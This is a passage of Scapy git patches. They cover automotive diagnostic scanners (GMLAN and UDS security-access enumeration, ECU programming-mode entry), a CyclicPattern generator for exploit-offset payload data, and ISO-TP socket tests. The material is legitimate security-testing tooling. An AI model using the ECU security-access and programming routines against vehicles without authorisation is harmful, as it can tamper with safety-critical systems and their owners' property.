log_interactive.critical( diff --git a/scapy/contrib/automotive/scanner/executor.py b/scapy/contrib/automotive/scanner/executor.py index 00bacb14e28..48762b7f619 100644 --- a/scapy/contrib/automotive/scanner/executor.py +++ b/scapy/contrib/automotive/scanner/executor.py @@ -238,6 +238,10 @@ def scan(self, timeout=None): log_interactive.critical("[-] Exception: %s", e) if self.configuration.debug: raise e + if isinstance(e, OSError): + log_interactive.critical( + "[-] OSError occurred, closing socket") + self.socket.close() if cast(SuperSocket, self.socket).closed and \ self.reconnect_handler is None: log_interactive.critical( diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index a68417be1b1..fdd0c3342fc 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -77,17 +77,22 @@ class debug: _DOC_SNDRCV_PARAMS = """ :param pks: SuperSocket instance to send/receive packets :param pkt: the packet to send - :param rcv_pks: if set, will be used instead of pks to receive packets. - packets will still be sent through pks - :param nofilter: put 1 to avoid use of BPF filters + :param timeout: how much time to wait after the last packet has been sent + :param inter: delay between two packets during sending + :param verbose: set verbosity level + :param chainCC: if True, KeyboardInterrupts will be forwarded :param retry: if positive, how many times to resend unanswered packets if negative, how many times to retry when no more packets are answered - :param timeout: how much time to wait after the last packet has been sent - :param verbose: set verbosity level :param multi: whether to accept multiple answers for the same stimulus + :param rcv_pks: if set, will be used instead of pks to receive packets. + packets will still be sent through pks :param prebuild: pre-build the packets before starting to send them. Automatically enabled when a generator is passed as the packet + :param _flood: + :param threaded: if True, packets will be sent in an individual thread + :param session: a flow decoder used to handle stream of packets + :param chainEX: if True, exceptions during send will be forwarded """ @@ -121,7 +126,8 @@ def __init__(self, prebuild=False, # type: bool _flood=None, # type: Optional[_FloodGenerator] threaded=False, # type: bool - session=None # type: Optional[_GlobSessionType] + session=None, # type: Optional[_GlobSessionType] + chainEX=False # type: bool ): # type: (...) -> None # Instantiate all arguments @@ -141,6 +147,7 @@ def __init__(self, self.multi = multi self.timeout = timeout self.session = session + self.chainEX = chainEX self._send_done = False self.notans = 0 self.noans = 0 @@ -246,7 +253,10 @@ def _sndrcv_snd(self): except SystemExit: pass except Exception: - log_runtime.exception("--- Error sending packets") + if self.chainEX: + raise + else: + log_runtime.exception("--- Error sending packets") finally: try: cast(Packet, self.tobesent).sent_time = \ diff --git a/test/regression.uts b/test/regression.uts index a34ec66965c..885a7c0ec72 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1467,6 +1467,21 @@ retry_test(_test_srpflood) _test_srp1flood = partial(_test_flood, "www.google.co.uk", srp1flood, True) retry_test(_test_srp1flood) += test chainEX +~ netaccess + +import socket +sck = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +ssck = StreamSocket(sck) + +try: + r = ssck.sr1(ICMP(type='echo-request'), timeout=0.1, chainEX=True) + assert False +except Exception: + assert True +finally: + sck.close() + = Sending and receiving an ICMPv6EchoRequest ~ netaccess ipv6 def _test(): diff --git a/test/testsocket.py b/test/testsocket.py index 121104f14e0..f10fcf6c11b 100644 --- a/test/testsocket.py +++ b/test/testsocket.py @@ -106,6 +106,17 @@ def __init__(self, basecls=None): # type: (Optional[Type[Packet]]) -> None super(UnstableSocket, self).__init__(basecls) self.last_rx_was_error = False + self.last_tx_was_error = False + + def send(self, x): + # type: (Packet) -> int + if not self.last_tx_was_error: + if random.randint(0, 1000) == 42: + self.last_tx_was_error = True + print("SOCKET CLOSED") + raise OSError("Socket closed") + self.last_tx_was_error = False + return super(UnstableSocket, self).send(x) def recv(self, x=MTU): # type: ignore # type: (int) -> Optional[Packet] From c9b30aad876808eaed54d300bcbdcc41bf41d370 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 9 Feb 2022 21:21:45 +0100 Subject: [PATCH 0739/1632] Speedup GMLAN Scanner tests --- scapy/contrib/automotive/gm/gmlan_scanner.py | 12 +++++++----- scapy/contrib/automotive/gm/gmlanutils.py | 19 ++++++++++++++----- test/contrib/automotive/gm/scanner.uts | 10 +++++----- 3 files changed, 26 insertions(+), 15 deletions(-) diff --git a/scapy/contrib/automotive/gm/gmlan_scanner.py b/scapy/contrib/automotive/gm/gmlan_scanner.py index cb199a4de48..bea3581568b 100644 --- a/scapy/contrib/automotive/gm/gmlan_scanner.py +++ b/scapy/contrib/automotive/gm/gmlan_scanner.py @@ -313,7 +313,8 @@ def _get_table_entry_z(self, tup): def pre_execute(self, socket, state, global_configuration): # type: (_SocketUnion, EcuState, AutomotiveTestCaseExecutorConfiguration) -> None # noqa: E501 - if cast(ServiceEnumerator, self)._retry_pkt[state] is not None: + if cast(ServiceEnumerator, self)._retry_pkt[state] is not None and \ + not global_configuration.unittest: # this is a retry execute. Wait much longer than usual because # a required time delay not expired could have been received # on the previous attempt @@ -492,9 +493,10 @@ def _get_initial_requests(self, **kwargs): def execute(self, socket, state, timeout=1, execution_time=1200, **kwargs): # type: (_SocketUnion, EcuState, int, int, Any) -> None - supported = GMLAN_InitDiagnostics(cast(SuperSocket, socket), - timeout=20, - verbose=kwargs.get("debug", False)) + supported = GMLAN_InitDiagnostics( + cast(SuperSocket, socket), timeout=20, + verbose=kwargs.get("debug", False), + unittest=kwargs.get("unittest", False)) # TODO: Refactor result storage if supported: self._store_result( @@ -521,7 +523,7 @@ def enter_state_with_tp(sock, conf, kwargs): # type: (_SocketUnion, AutomotiveTestCaseExecutorConfiguration, Dict[str, Any]) -> bool # noqa: E501 GMLAN_TPEnumerator.enter(sock, conf, kwargs) res = GMLAN_InitDiagnostics(cast(SuperSocket, sock), timeout=20, - verbose=False) + verbose=False, unittest=conf.unittest) if not res: GMLAN_TPEnumerator.cleanup(sock, conf) return False diff --git a/scapy/contrib/automotive/gm/gmlanutils.py b/scapy/contrib/automotive/gm/gmlanutils.py index f5b958f6182..a17c23b4202 100644 --- a/scapy/contrib/automotive/gm/gmlanutils.py +++ b/scapy/contrib/automotive/gm/gmlanutils.py @@ -77,7 +77,8 @@ def GMLAN_InitDiagnostics( broadcast_socket=None, # type: Optional[SuperSocket] timeout=None, # type: Optional[int] verbose=None, # type: Optional[bool] - retry=0 # type: int + retry=0, # type: int + unittest=False # type: bool ): # type: (...) -> bool """ Send messages to put an ECU into diagnostic/programming state. @@ -89,6 +90,7 @@ def GMLAN_InitDiagnostics( :param timeout: timeout for sending, receiving or sniffing packages. :param verbose: set verbosity level :param retry: number of retries in case of failure. + :param unittest: disable delays :return: True on success else False """ # Helper function @@ -115,7 +117,9 @@ def _send_and_check_response(sock, req, timeout, verbose): if verbose: print("Sending %s as broadcast" % repr(p)) broadcast_socket.send(p) - time.sleep(0.05) + + if not unittest: + time.sleep(0.05) # ReportProgrammedState p = GMLAN(service="ReportProgrammingState") @@ -125,7 +129,9 @@ def _send_and_check_response(sock, req, timeout, verbose): p = GMLAN() / GMLAN_PM(subfunction="requestProgrammingMode") if not _send_and_check_response(sock, p, timeout, verbose): continue - time.sleep(0.05) + + if not unittest: + time.sleep(0.05) # InitiateProgramming enableProgramming # No response expected @@ -143,7 +149,8 @@ def GMLAN_GetSecurityAccess( level=1, # type: int timeout=None, # type: Optional[int] verbose=None, # type: Optional[bool] - retry=0 # type: int + retry=0, # type: int + unittest=False # type: bool ): # type: (...) -> bool """ Authenticate on ECU. Implements Seey-Key procedure. @@ -154,6 +161,7 @@ def GMLAN_GetSecurityAccess( :param timeout: timeout for sending, receiving or sniffing packages. :param verbose: set verbosity level :param retry: number of retries in case of failure. + :param unittest: disable internal delays :return: True on success. """ if verbose is None: @@ -178,7 +186,8 @@ def GMLAN_GetSecurityAccess( if resp is not None and resp.returnCode == 0x37 and retry: if verbose: print("RequiredTimeDelayNotExpired. Wait 10s.") - time.sleep(10) + if not unittest: + time.sleep(10) if verbose: print("Negative Response.") continue diff --git a/test/contrib/automotive/gm/scanner.uts b/test/contrib/automotive/gm/scanner.uts index 0647fd0623f..73fbc05359e 100644 --- a/test/contrib/automotive/gm/scanner.uts +++ b/test/contrib/automotive/gm/scanner.uts @@ -34,7 +34,7 @@ def executeScannerInVirtualEnvironment(supported_responses, enumerators, **kwarg answering_machine = EcuAnsweringMachine(supported_responses=supported_responses, main_socket=ecu, basecls=GMLAN, verbose=False) def reset(): answering_machine.reset_state() - sniff(timeout=0.01, opened_socket=[ecu, tester]) + sniff(timeout=0.001, opened_socket=[ecu, tester]) sim = threading.Thread(target=answering_machine, kwargs={'timeout': 1000, "stop_filter": lambda x: bytes(x) == b"\xff\xff\xff"}) sim.start() try: @@ -118,10 +118,11 @@ keyfunction = securityAccess_Algorithm1 scanner = executeScannerInVirtualEnvironment( mEcu.supported_responses, - [GMLAN_ServiceEnumerator, GMLAN_IDOEnumerator, GMLAN_PMEnumerator, GMLAN_RDEnumerator, GMLAN_SAEnumerator], - GMLAN_SAEnumerator_kwargs={"keyfunction": keyfunction}) + [GMLAN_IDOEnumerator, GMLAN_PMEnumerator, GMLAN_RDEnumerator, GMLAN_SAEnumerator], + GMLAN_SAEnumerator_kwargs={"keyfunction": keyfunction, "scan_range": range(2)}, + GMLAN_PMEnumerator_kwargs={"unittest": True}) -assert len(scanner.state_paths) == 11 +assert len(scanner.state_paths) == 9 assert scanner.scan_completed assert EcuState(session=1) in scanner.final_states @@ -133,7 +134,6 @@ assert EcuState(session=3, tp=1, security_level=2) in scanner.final_states assert EcuState(session=2, tp=1, communication_control=1, security_level=2, request_download=1) in scanner.final_states = Simulate ECU and test GMLAN_RDBIEnumerator -~ disabled resps = [EcuResponse(None, [GMLAN()/GMLAN_RDBIPR(dataIdentifier=1)/Raw(b"asdfbeef1")]), EcuResponse(None, [GMLAN()/GMLAN_RDBIPR(dataIdentifier=2)/Raw(b"beef2")]), From 1b2cdb1ec658bf956700898cbb04edce8f40bce9 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 21 Feb 2022 12:19:31 +0100 Subject: [PATCH 0740/1632] UDS: add standalone 'get_security_access' function (UDS_SA enumerators) * Add standalone 'get_security_access' function for UDS_SA enumerators * minor enhancment to fix IndexError --- scapy/contrib/automotive/uds_scan.py | 14 +++++++------ .../automotive/scanner/uds_scanner.uts | 21 +++++++++++++++++++ 2 files changed, 29 insertions(+), 6 deletions(-) diff --git a/scapy/contrib/automotive/uds_scan.py b/scapy/contrib/automotive/uds_scan.py index 5df060704f9..87b139e6a36 100644 --- a/scapy/contrib/automotive/uds_scan.py +++ b/scapy/contrib/automotive/uds_scan.py @@ -650,18 +650,20 @@ def get_security_access(self, sock, level=1, seed_pkt=None): if key_pkt is None: return False - last_seed_req = self._results[-1].req - last_state = self._results[-1].state - try: res = sock.sr1(key_pkt, timeout=5, verbose=False) if sock.closed: log_interactive.critical("[-] Socket closed during scan.") raise Scapy_Exception("Socket closed during scan") except (OSError, ValueError, Scapy_Exception) as e: - if not self._populate_retry(last_state, last_seed_req): - log_interactive.critical( - "[-] Exception during retry. This is bad") + try: + last_seed_req = self._results[-1].req + last_state = self._results[-1].state + if not self._populate_retry(last_state, last_seed_req): + log_interactive.critical( + "[-] Exception during retry. This is bad") + except IndexError: + log_interactive.warning("[-] Couldn't populate retry.") raise e return self.evaluate_security_access_response( diff --git a/test/contrib/automotive/scanner/uds_scanner.uts b/test/contrib/automotive/scanner/uds_scanner.uts index f952567cda7..300539db9b1 100644 --- a/test/contrib/automotive/scanner/uds_scanner.uts +++ b/test/contrib/automotive/scanner/uds_scanner.uts @@ -125,6 +125,27 @@ assert False == e._evaluate_response(s, UDS(b"\x27\x01"), UDS(b"\x67\x02ab"), ** assert e._retry_pkt[s] == None += Test UDS_SA_XOR_Enumerator stand alone mode + +TesterSocket = TestSocket +ecu = TestSocket(UDS) +tester = TesterSocket(UDS) +ecu.pair(tester) +answering_machine = EcuAnsweringMachine(supported_responses=mEcu.supported_responses, main_socket=ecu, basecls=UDS, verbose=False) +sim = threading.Thread(target=answering_machine, kwargs={'timeout': 1000, "stop_filter": lambda x: bytes(x) == b"\xff\xff\xff"}) +sim.start() +try: + resp = tester.sr1(UDS()/UDS_TP(b"\x00"), verbose=False, timeout=1) + print(repr(resp)) + assert resp and resp.service != 0x7f + resp = tester.sr1(UDS()/UDS_DSC(diagnosticSessionType=3), verbose=False, timeout=1) + print(repr(resp)) + assert resp and resp.service != 0x7f + assert UDS_SA_XOR_Enumerator().get_security_access(tester, 1) +finally: + tester.send(Raw(b"\xff\xff\xff")) + sim.join(timeout=2) + = Simulate ECU and run Scanner From 7ab7fbb84b2fa6e9376c84bfbf826740d1707b19 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 24 Feb 2022 18:16:36 +0100 Subject: [PATCH 0741/1632] Increase test-coverage of uds_scanner (#3520) * Increase test-coverage of uds_scanner --- test/contrib/automotive/scanner/uds_scanner.uts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/test/contrib/automotive/scanner/uds_scanner.uts b/test/contrib/automotive/scanner/uds_scanner.uts index 300539db9b1..49dc8d5c36a 100644 --- a/test/contrib/automotive/scanner/uds_scanner.uts +++ b/test/contrib/automotive/scanner/uds_scanner.uts @@ -797,7 +797,7 @@ result = tc1.show(dump=True) assert "requestOutOfRange received " in result = UDS_RMBAEnumerator -~ not_pypy disabled +~ linux memory = dict() From e2fc7dddb40a7b80f2e65ad6593c0b10080019d0 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 24 Feb 2022 18:16:53 +0100 Subject: [PATCH 0742/1632] Add CyclicPattern class for generation of payload data (#3508) * Add CyclicPattern class for generation of payload data * minor enhancment * fix python2 * fix python2 * use six * fix flake --- scapy/volatile.py | 117 +++++++++++++++++++++++++++++++++++++++++++++- test/random.uts | 96 ++++++++++++++++++++++++++++++++++++- 2 files changed, 211 insertions(+), 2 deletions(-) diff --git a/scapy/volatile.py b/scapy/volatile.py index 37fb0b54fd7..556fd33afc7 100644 --- a/scapy/volatile.py +++ b/scapy/volatile.py @@ -17,10 +17,12 @@ import re import uuid import struct +import string from scapy.base_classes import Net from scapy.compat import bytes_encode, chb, plain_str from scapy.utils import corrupt_bits, corrupt_bytes +from scapy.modules.six.moves import zip_longest from scapy.compat import ( List, @@ -509,7 +511,8 @@ def __mul__(self, n): class RandString(_RandString[bytes]): - _DEFAULT_CHARS = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" # noqa: E501 + _DEFAULT_CHARS = (string.ascii_uppercase + string.ascii_lowercase + + string.digits).encode("utf-8") def __init__(self, size=None, chars=_DEFAULT_CHARS): # type: (Optional[Union[int, RandNum]], bytes) -> None @@ -1409,3 +1412,115 @@ class CorruptedBits(CorruptedBytes): def _fix(self): # type: () -> bytes return corrupt_bits(self.s, self.p, self.n) + + +class CyclicPattern(VolatileValue[bytes]): + """ + Generate a cyclic pattern + + :param size: Size of generated pattern. Default is random size. + :param start: Start offset of the generated pattern. + :param charset_type: Charset types: + 0: basic (0-9A-Za-z) + 1: extended + 2: maximum (almost printable chars) + + + The code of this class was inspired by + + PEDA - Python Exploit Development Assistance for GDB + Copyright (C) 2012 Long Le Dinh + License: This work is licensed under a Creative Commons + Attribution-NonCommercial-ShareAlike 3.0 Unported License. + """ + + @staticmethod + def cyclic_pattern_charset(charset_type=None): + # type: (Optional[int]) -> str + """ + :param charset_type: charset type + 0: basic (0-9A-Za-z) + 1: extended (default) + 2: maximum (almost printable chars) + :return: list of charset + """ + + charset = \ + [string.ascii_uppercase, string.ascii_lowercase, string.digits] + + if charset_type == 1: # extended type + charset[1] = "%$-;" + re.sub("[sn]", "", charset[1]) + charset[2] = "sn()" + charset[2] + + if charset_type == 2: # maximum type + charset += [string.punctuation] + + return "".join( + ["".join(k) for k in zip_longest(*charset, fillvalue="")]) + + @staticmethod + def de_bruijn(charset, n, maxlen): + # type: (str, int, int) -> str + """ + Generate the De Bruijn Sequence up to `maxlen` characters + for the charset `charset` and subsequences of length `n`. + Algorithm modified from wikipedia + https://en.wikipedia.org/wiki/De_Bruijn_sequence + """ + k = len(charset) + a = [0] * k * n + sequence = [] # type: List[str] + + def db(t, p): + # type: (int, int) -> None + if len(sequence) == maxlen: + return + + if t > n: + if n % p == 0: + for j in range(1, p + 1): + sequence.append(charset[a[j]]) + if len(sequence) == maxlen: + return + else: + a[t] = a[t - p] + db(t + 1, p) + for j in range(a[t - p] + 1, k): + a[t] = j + db(t + 1, t) + + db(1, 1) + return ''.join(sequence) + + def __init__(self, size=None, start=0, charset_type=None): + # type: (Optional[int], int, Optional[int]) -> None + self.size = size if size is not None else RandNumExpo(0.01) + self.start = start + self.charset_type = charset_type + + def _command_args(self): + # type: () -> str + ret = "" + if isinstance(self.size, VolatileValue): + if self.size.lambd != 0.01 or self.size.base != 0: + ret += "size=%r" % self.size.command() + else: + ret += "size=%r" % self.size + + if self.start != 0: + ret += ", start=%r" % self.start + + if self.charset_type: + ret += ", charset_type=%r" % self.charset_type + + return ret + + def _fix(self): + # type: () -> bytes + if isinstance(self.size, VolatileValue): + size = self.size._fix() + else: + size = self.size + charset = self.cyclic_pattern_charset(self.charset_type or 0) + pattern = self.de_bruijn(charset, 3, size + self.start) + return pattern[self.start:size + self.start].encode('utf-8') diff --git a/test/random.uts b/test/random.uts index 29577e9d147..503a3e5a417 100644 --- a/test/random.uts +++ b/test/random.uts @@ -133,4 +133,98 @@ assert de.command() == "DelayedEval(expr='3 + 1')" v = IncrementalValue(restart=2) assert v == 0 and v == 1 and v == 2 and v == 0 -assert v.command() == "IncrementalValue(restart=2)" \ No newline at end of file +assert v.command() == "IncrementalValue(restart=2)" + += CyclicPattern charset 0 + +cs0 = b'AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAlAAMAAmAANAAnAAOAAoAAPAApAAQAAqAARAArAASAAsAATAAtAAUAAuAAVAAvAAWAAwAAXAAxAAYAAyAAZAAzAaaAa0AaBAabAa1AaCAacAa2AaDAadAa3AaEAaeAa4AaFAafAa5AaGAagAa6AaHAahAa7AaIAaiAa8AaJ' + +p = Raw(load=CyclicPattern()) +b = bytes(p) +if len(b): + if len(b) > len(cs0): + assert cs0 in b + else: + assert b in cs0 or b == cs0 + +p = Raw(load=CyclicPattern(5)) +b = bytes(p) +assert len(b) == 5 +assert b == b'AAAaA' + +p = Raw(load=CyclicPattern(2, 3)) +b = bytes(p) +print(b) +assert len(b) == 2 +assert b == b'aA' + += CyclicPattern charset 1 + +cs1 = b'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%' + +p = Raw(load=CyclicPattern(None, 0, 1)) +b = bytes(p) +if len(b): + if len(b) > len(cs1): + assert cs1 in b + else: + assert b in cs1 or b == cs1 + +p = Raw(load=CyclicPattern(10, 0, 1)) +b = bytes(p) +assert len(b) == 10 +assert b == b'AAA%AAsAAB' + +p = Raw(load=CyclicPattern(2, 8, 1)) +b = bytes(p) +print(b) +assert len(b) == 2 +assert b == b'AB' + += CyclicPattern charset 2 + +cs2 = b'AAAaAA0AA!AABAAbAA1AA"AACAAcAA2AA#AADAAdAA3AA$AAEAAeAA4AA%AAFAAfAA5AA&AAGAAgAA6AA\'AAHAAhAA7AA(AAIAAiAA8AA)AAJAAjAA9AA*AAKAAkAA+AALAAlAA,AAMAAmAA-AANAAnAA.AAOAAoAA/AAPAApAA:AAQAAqAA;AARAArAAAAUAAuAA?AAVAAvAA@AAWAAwAA[AAXAAxAA\\AAYAAyAA]AAZAAzAA^AA_AA`AA{AA|AA}AA~AaaAa0Aa!AaBAabAa1Aa"Aa' + +p = Raw(load=CyclicPattern(None, 0, 2)) +b = bytes(p) +if len(b): + if len(b) > len(cs2): + assert cs2 in b + else: + assert b in cs2 or b == cs2 + +p = Raw(load=CyclicPattern(10, 0, 2)) +b = bytes(p) +assert len(b) == 10 +assert b == b'AAAaAA0AA!' + +p = Raw(load=CyclicPattern(2, 8, 2)) +b = bytes(p) +print(b) +assert len(b) == 2 +assert b == b'A!' + += CyclicPattern command + +p = Raw(load=CyclicPattern(2, 8, 2)) +cmd = p.command() + +assert "charset_type=2" in cmd +assert "start=8" in cmd +assert "size=2" in cmd + +p = Raw(load=CyclicPattern(2)) +cmd = p.command() + +assert "charset_type" not in cmd +assert "start" not in cmd +assert "size=2" in cmd + +p = Raw(load=CyclicPattern()) +cmd = p.command() + +assert "charset_type" not in cmd +assert "start" not in cmd +assert "size" not in cmd + + From 8d52089c525d72c2c20aedd4d31da0d8a75e6f9c Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 22 Feb 2022 10:39:29 +0100 Subject: [PATCH 0743/1632] Fix BMW specific packet definitions --- scapy/contrib/automotive/bmw/definitions.py | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/scapy/contrib/automotive/bmw/definitions.py b/scapy/contrib/automotive/bmw/definitions.py index f4934625a05..d47c56a2588 100644 --- a/scapy/contrib/automotive/bmw/definitions.py +++ b/scapy/contrib/automotive/bmw/definitions.py @@ -10,7 +10,8 @@ from scapy.packet import Packet, bind_layers from scapy.fields import ByteField, ShortField, ByteEnumField, X3BytesField, \ StrField, StrFixedLenField, LEIntField, LEThreeBytesField, \ - PacketListField, IntField, IPField, ThreeBytesField, ShortEnumField + PacketListField, IntField, IPField, ThreeBytesField, ShortEnumField, \ + XStrFixedLenField from scapy.contrib.automotive.uds import UDS, UDS_RDBI, UDS_DSC, UDS_IOCBI, \ UDS_RC, UDS_RD, UDS_RSDBI, UDS_RDBIPR @@ -247,7 +248,7 @@ class UDS2S_REQ(Packet): class SVK_DateField(LEThreeBytesField): def i2repr(self, pkt, x): x = self.addfield(pkt, b"", x) - return "%02X.%02X.20%02X" % (x[0], x[1], x[2]) + return "%02X.%02X.20%02X" % (x[2], x[1], x[0]) class SVK_Entry(Packet): @@ -255,7 +256,7 @@ class SVK_Entry(Packet): ByteEnumField("processClass", 0, {1: "HWEL", 2: "HWAP", 4: "GWTB", 5: "CAFD", 6: "BTLD", 7: "FLSL", 8: "SWFL"}), - StrFixedLenField("svk_id", b"", length=4), + XStrFixedLenField("svk_id", b"", length=4), ByteField("mainVersion", 0), ByteField("subVersion", 0), ByteField("patchVersion", 0)] From 0e2f245219aceeb29c439e46779d167f8152f874 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 24 Feb 2022 18:23:58 +0100 Subject: [PATCH 0744/1632] Increase test-coverage of ISOTPSockets (#3529) * Increase test-coverage of ISOTPSockets * fix flake * fix minor bug and improve unit tests --- scapy/contrib/isotp/isotp_native_socket.py | 28 +++++++++-- scapy/contrib/isotp/isotp_soft_socket.py | 17 +++---- test/contrib/isotp_native_socket.uts | 54 ++++++++++++++++++++++ 3 files changed, 87 insertions(+), 12 deletions(-) diff --git a/scapy/contrib/isotp/isotp_native_socket.py b/scapy/contrib/isotp/isotp_native_socket.py index 4dcde79aef3..5f80fa61847 100644 --- a/scapy/contrib/isotp/isotp_native_socket.py +++ b/scapy/contrib/isotp/isotp_native_socket.py @@ -89,6 +89,25 @@ class ifreq(ctypes.Structure): class ISOTPNativeSocket(SuperSocket): + """ + ISOTPSocket using the can-isotp kernel module + + :param iface: a CANSocket instance or an interface name + :param tx_id: the CAN identifier of the sent CAN frames + :param rx_id: the CAN identifier of the received CAN frames + :param ext_address: the extended address of the sent ISOTP frames + :param rx_ext_address: the extended address of the received ISOTP frames + :param bs: block size sent in Flow Control ISOTP frames + :param stmin: minimum desired separation time sent in + Flow Control ISOTP frames + :param padding: If True, pads sending packets with 0x00 which not + count to the payload. + Does not affect receiving packets. + :param listen_only: Does not send Flow Control frames if a First Frame is + received + :param frame_txtime: Separation time between two CAN frames during send + :param basecls: base class of the packets emitted by this socket + """ desc = "read/write packets at a given CAN interface using CAN_ISOTP socket " # noqa: E501 can_isotp_options_fmt = "@2I4B" can_isotp_fc_options_fmt = "@3B" @@ -266,10 +285,11 @@ def __init__(self, rx_id=0, # type: int ext_address=None, # type: Optional[int] rx_ext_address=None, # type: Optional[int] - listen_only=False, # type: bool + bs=CAN_ISOTP_DEFAULT_RECV_BS, # type: int + stmin=CAN_ISOTP_DEFAULT_RECV_STMIN, # type: int padding=False, # type: bool - frame_txtime=100, # type: int - stmin=0, # type: int + listen_only=False, # type: bool + frame_txtime=CAN_ISOTP_DEFAULT_FRAME_TXTIME, # type: int basecls=ISOTP # type: Type[Packet] ): # type: (...) -> None @@ -306,7 +326,7 @@ def __init__(self, self.can_socket.setsockopt(SOL_CAN_ISOTP, CAN_ISOTP_RECV_FC, self.__build_can_isotp_fc_options( - stmin=stmin)) + stmin=stmin, bs=bs)) self.can_socket.setsockopt(SOL_CAN_ISOTP, CAN_ISOTP_LL_OPTS, self.__build_can_isotp_ll_options()) diff --git a/scapy/contrib/isotp/isotp_soft_socket.py b/scapy/contrib/isotp/isotp_soft_socket.py index a0c4c4d6477..5eb1d97d53c 100644 --- a/scapy/contrib/isotp/isotp_soft_socket.py +++ b/scapy/contrib/isotp/isotp_soft_socket.py @@ -92,15 +92,15 @@ class ISOTPSoftSocket(SuperSocket): :param tx_id: the CAN identifier of the sent CAN frames :param rx_id: the CAN identifier of the received CAN frames :param ext_address: the extended address of the sent ISOTP frames - (can be None) - :param rx_ext_address: the extended address of the received ISOTP - frames (can be None) + :param rx_ext_address: the extended address of the received ISOTP frames :param bs: block size sent in Flow Control ISOTP frames :param stmin: minimum desired separation time sent in Flow Control ISOTP frames :param padding: If True, pads sending packets with 0x00 which not count to the payload. Does not affect receiving packets. + :param listen_only: Does not send Flow Control frames if a First Frame is + received :param basecls: base class of the packets emitted by this socket """ # noqa: E501 @@ -127,17 +127,17 @@ def __init__(self, raise Scapy_Exception("Provide a CANSocket object instead") self.ext_address = ext_address - self.rx_ext_address = rx_ext_address + self.rx_ext_address = rx_ext_address or ext_address self.tx_id = tx_id self.rx_id = rx_id impl = ISOTPSocketImplementation( can_socket, - tx_id=tx_id, - rx_id=rx_id, + tx_id=self.tx_id, + rx_id=self.rx_id, padding=padding, - ext_address=ext_address, - rx_ext_address=rx_ext_address, + ext_address=self.ext_address, + rx_ext_address=self.rx_ext_address, bs=bs, stmin=stmin, listen_only=listen_only @@ -897,6 +897,7 @@ def _recv_cf(self, data): load = self.ea_hdr load += struct.pack("BBB", N_PCI_FC, self.rxfc_bs, self.rxfc_stmin) + self.rx_bs = 0 self.can_send(load) # wait for another CF diff --git a/test/contrib/isotp_native_socket.uts b/test/contrib/isotp_native_socket.uts index b9a4688b67d..be9d5621a01 100644 --- a/test/contrib/isotp_native_socket.uts +++ b/test/contrib/isotp_native_socket.uts @@ -103,6 +103,60 @@ assert(result_data == isotp.data) timer.join(5) assert not timer.is_alive() += Compatibility ISOTPSoftSocket ISOTPNativeSocket various configs +exit_if_no_isotp_module() + +message = "01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14" * 5 + +kwargs = [({"tx_id": 0x242, "rx_id": 0x642, "bs": 0, "stmin": 0, "padding": False, "ext_address": None, "rx_ext_address": None}, + {"tx_id": 0x642, "rx_id": 0x242, "bs": 0, "stmin": 0, "padding": False, "ext_address": None, "rx_ext_address": None}), + ({"tx_id": 0x242, "rx_id": 0x642, "bs": 2, "stmin": 0, "padding": False, "ext_address": None, "rx_ext_address": None}, + {"tx_id": 0x642, "rx_id": 0x242, "bs": 0, "stmin": 0, "padding": False, "ext_address": None, "rx_ext_address": None}), + ({"tx_id": 0x242, "rx_id": 0x642, "bs": 5, "stmin": 0, "padding": False, "ext_address": None, "rx_ext_address": None}, + {"tx_id": 0x642, "rx_id": 0x242, "bs": 0, "stmin": 0, "padding": False, "ext_address": None, "rx_ext_address": None}), + ({"tx_id": 0x242, "rx_id": 0x642, "bs": 0, "stmin": 5, "padding": False, "ext_address": None, "rx_ext_address": None}, + {"tx_id": 0x642, "rx_id": 0x242, "bs": 0, "stmin": 0, "padding": False, "ext_address": None, "rx_ext_address": None}), + ({"tx_id": 0x242, "rx_id": 0x642, "bs": 0, "stmin": 10, "padding": False, "ext_address": None, "rx_ext_address": None}, + {"tx_id": 0x642, "rx_id": 0x242, "bs": 0, "stmin": 0, "padding": False, "ext_address": None, "rx_ext_address": None}), + ({"tx_id": 0x242, "rx_id": 0x642, "bs": 4, "stmin": 130, "padding": False, "ext_address": None, "rx_ext_address": None}, + {"tx_id": 0x642, "rx_id": 0x242, "bs": 0, "stmin": 0, "padding": False, "ext_address": None, "rx_ext_address": None}), + ({"tx_id": 0x242, "rx_id": 0x642, "bs": 3, "stmin": 0, "padding": True, "ext_address": None, "rx_ext_address": None}, + {"tx_id": 0x642, "rx_id": 0x242, "bs": 0, "stmin": 0, "padding": True, "ext_address": None, "rx_ext_address": None}), + ({"tx_id": 0x242, "rx_id": 0x642, "bs": 0, "stmin": 0, "padding": False, "ext_address": 0xfe, "rx_ext_address": None}, + {"tx_id": 0x642, "rx_id": 0x242, "bs": 0, "stmin": 0, "padding": False, "ext_address": 0xfe, "rx_ext_address": None}), + ({"tx_id": 0x242, "rx_id": 0x642, "bs": 0, "stmin": 0, "padding": False, "ext_address": 0xfe, "rx_ext_address": 0xef}, + {"tx_id": 0x642, "rx_id": 0x242, "bs": 0, "stmin": 0, "padding": False, "ext_address": 0xef, "rx_ext_address": 0xfe}), + 